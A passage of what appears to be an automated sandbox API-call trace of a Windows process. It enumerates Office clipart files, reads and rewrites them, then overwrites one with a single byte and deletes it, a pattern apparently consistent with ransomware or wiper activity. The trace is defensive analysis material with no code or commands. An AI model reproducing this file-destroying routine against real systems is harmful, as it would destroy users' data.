InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.401] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.401] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a7c, dwReserved0=0x1, dwReserved1=0x0, cFileName="EN00242_.WMF", cAlternateFileName="")) returned 1 [0124.401] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.401] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.401] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.401] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0124.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0124.401] AreFileApisANSI () returned 1 [0124.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00242_.WMF", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00242_.WMF", lpUsedDefaultChar=0x0) returned 69 [0124.401] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.401] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.406] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.407] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.407] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8e8, dwReserved0=0x1, dwReserved1=0x0, cFileName="EN00319_.WMF", cAlternateFileName="")) returned 1 [0124.407] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.407] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.407] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.407] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0124.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0124.407] AreFileApisANSI () returned 1 [0124.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00319_.WMF", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00319_.WMF", lpUsedDefaultChar=0x0) returned 69 [0124.407] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.407] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.412] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.412] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.412] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc2f4b6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e0, dwReserved0=0x1, dwReserved1=0x0, cFileName="EN00320_.WMF", cAlternateFileName="")) returned 1 [0124.412] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.412] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.412] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.412] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0124.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0124.412] AreFileApisANSI () returned 1 [0124.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00320_.WMF", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00320_.WMF", lpUsedDefaultChar=0x0) returned 69 [0124.412] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.412] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.418] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.418] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.418] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc2f4b6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x439c, dwReserved0=0x1, dwReserved1=0x0, cFileName="EN00397_.WMF", cAlternateFileName="")) returned 1 [0124.418] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.418] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.418] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.418] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a9f0 | out: hHeap=0x20000) returned 1 [0124.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0124.418] AreFileApisANSI () returned 1 [0124.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00397_.WMF", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00397_.WMF", lpUsedDefaultChar=0x0) returned 69 [0124.418] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.418] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.425] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.425] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.425] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f08, dwReserved0=0x1, dwReserved1=0x0, cFileName="EN00902_.WMF", cAlternateFileName="")) returned 1 [0124.425] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.425] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.425] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.425] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0124.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0124.425] AreFileApisANSI () returned 1 [0124.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00902_.WMF", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00902_.WMF", lpUsedDefaultChar=0x0) returned 69 [0124.425] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.425] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0129.548] GetLastError () returned 0x0 [0133.694] GetLastError () returned 0x0 [0133.694] SetLastError (dwErrCode=0x0) [0133.694] GetLastError () returned 0x0 [0133.694] SetLastError (dwErrCode=0x0) [0133.695] GetLastError () returned 0x0 [0133.695] SetLastError (dwErrCode=0x0) [0133.695] GetLastError () returned 0x0 [0133.695] SetLastError (dwErrCode=0x0) [0133.695] ReadFile (in: hFile=0x2ac, lpBuffer=0xa0b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0xa0b58*, lpNumberOfBytesRead=0x327f0c4*=0x338, lpOverlapped=0x0) returned 1 [0133.698] ReadFile (in: hFile=0x2ac, lpBuffer=0xa0b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0xa0b58*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0133.698] WriteFile (in: hFile=0x288, lpBuffer=0x9db40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x9db40*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0133.700] GetLastError () returned 0x0 [0133.700] GetLastError () returned 0x0 [0133.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4e0 | out: hHeap=0x20000) returned 1 [0133.700] WriteFile (in: hFile=0x288, lpBuffer=0x9db40*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x9db40*, lpNumberOfBytesWritten=0x327ef70*=0x340, lpOverlapped=0x0) returned 1 [0133.701] GetLastError () returned 0x0 [0133.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x40d28 | out: hHeap=0x20000) returned 1 [0133.701] GetLastError () returned 0x0 [0133.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x9db40 | out: hHeap=0x20000) returned 1 [0133.701] CloseHandle (hObject=0x288) returned 1 [0133.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0xa0b58 | out: hHeap=0x20000) returned 1 [0133.702] CloseHandle (hObject=0x2ac) returned 1 [0133.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x40d38 [0133.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x40d58 [0133.702] AreFileApisANSI () returned 1 [0133.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0133.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8abb8 [0133.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x8abb8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107450.WMF") returned 69 [0133.703] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107450.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107450.wmf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0133.704] GetFileType (hFile=0x2ac) returned 0x1 [0133.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0133.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0xa0b58 [0133.704] GetLastError () returned 0xb7 [0133.704] WriteFile (in: hFile=0x2ac, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0133.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0xa0b58 | out: hHeap=0x20000) returned 1 [0133.705] CloseHandle (hObject=0x2ac) returned 1 [0133.706] AreFileApisANSI () returned 1 [0133.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0133.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0133.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107450.WMF") returned 69 [0133.706] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107450.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107450.wmf")) returned 1 [0133.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0133.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x40d58 | out: hHeap=0x20000) returned 1 [0133.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x40d38 | out: hHeap=0x20000) returned 1 [0133.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x40f98 | out: hHeap=0x20000) returned 1 [0133.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x40fe8 | out: hHeap=0x20000) returned 1 [0133.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x40f68 | out: hHeap=0x20000) returned 1 [0133.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x40fd8 | out: hHeap=0x20000) returned 1 [0133.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x929c8 | out: hHeap=0x20000) returned 1 [0133.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0133.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0133.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53970 | out: hHeap=0x20000) returned 1 [0133.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bd10 | out: hHeap=0x20000) returned 1 [0133.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0133.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0133.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0133.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x40f38 | out: hHeap=0x20000) returned 1 [0133.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x40ef8 | out: hHeap=0x20000) returned 1 [0133.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0133.707] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0133.707] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0133.707] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6c3c1e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe6c3c1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe6e9e74, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x52e0, dwReserved0=0x1, dwReserved1=0x0, cFileName="J0107452.WMF", cAlternateFileName="")) returned 1 [0133.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0133.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0133.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0133.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0133.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0133.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0133.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0133.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0133.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x40ef8 [0133.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0133.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x40ef8 | out: hHeap=0x20000) returned 1 [0133.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0133.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x40ef8 [0133.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0133.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x40ef8 | out: hHeap=0x20000) returned 1 [0133.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0133.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0133.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0133.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0133.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fb08 [0133.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0133.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0133.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0133.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fb08 | out: hHeap=0x20000) returned 1 [0133.708] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0133.708] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0133.708] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0133.708] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0133.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0133.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0133.708] AreFileApisANSI () returned 1 [0133.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF", lpUsedDefaultChar=0x0) returned 69 [0133.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0133.708] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0133.708] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0133.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x40f38 [0133.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x40fd8 [0133.709] AreFileApisANSI () returned 1 [0133.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0133.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a660 [0133.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF") returned 69 [0133.709] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF" (normalized: "c:\\program files\\microsoft 